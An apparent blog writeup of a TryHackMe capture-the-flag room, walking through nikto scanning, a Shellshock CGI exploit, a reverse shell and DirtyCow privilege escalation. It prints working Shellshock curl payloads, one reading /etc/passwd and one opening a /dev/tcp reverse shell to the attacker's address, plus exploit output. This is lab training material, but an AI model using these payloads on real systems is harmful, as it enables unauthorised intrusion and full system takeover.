성 조지's Blog

0day - Tryhackme Writeup!

<3

성 조지's photo
성 조지
·

3 min read

1. Enumeration

nikto --url {IP}

---------------------------------------------------------------------------
+ Target IP:          {IP}
+ Target Hostname:    {IP}
+ Target Port:        80
+ Start Time:         2020-10-25 10:38:36 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /, inode: bd1, size: 5ae57bb9a1192, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header '93e4r0-cve-2014-6278' found, with contents: true
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /backup/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/index.html: Admin login page/section found.
+ 8699 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2020-10-25 10:44:25 (GMT1) (349 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

2. Exploitation

curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" http://{IP}/cgi-bin/test.cgi

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ryan:x:1000:1000:Ubuntu 14.04.1,,,:/home/ryan:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

3. Gain Access

bird@security:~# curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/{YOUR_OVPN_IP}/9001 0>&1';" http://{IP}/cgi-bin/test.cgi

4. Post Exploitation

Go inside the home directory

www-data@ubuntu:/usr/lib/cgi-bin$ cd /home/ryan

list all files

www-data@ubuntu:/home/ryan/$ ls
user.txt

print the user flag from the text file in you terminal

www-data@ubuntu:/home/ryan/$ cat user.txt
THM{FLAG}

5. Priv Escalation

Go inside the tmp directory

www-data@ubuntu:/home/ryan$ cd /tmp

www-data@ubuntu:/tmp$ ls
cow  socat
www-data@ubuntu:/tmp$ chmod +x cow
www-data@ubuntu:/tmp$ ./cow
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 47032
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Dont forget to restore /tmp/bak
thread stopped
thread stopped

6. Finding the root flag

root@ubuntu:/tmp# whoami
root

Go inside the root directory and list all files

root@ubuntu:/tmp# cd /root && ls
root.xt

print the root flag from the text file in you terminal

root@ubuntu:/root# cat root.txt
THM{FLAG}
#cybersecurityhacking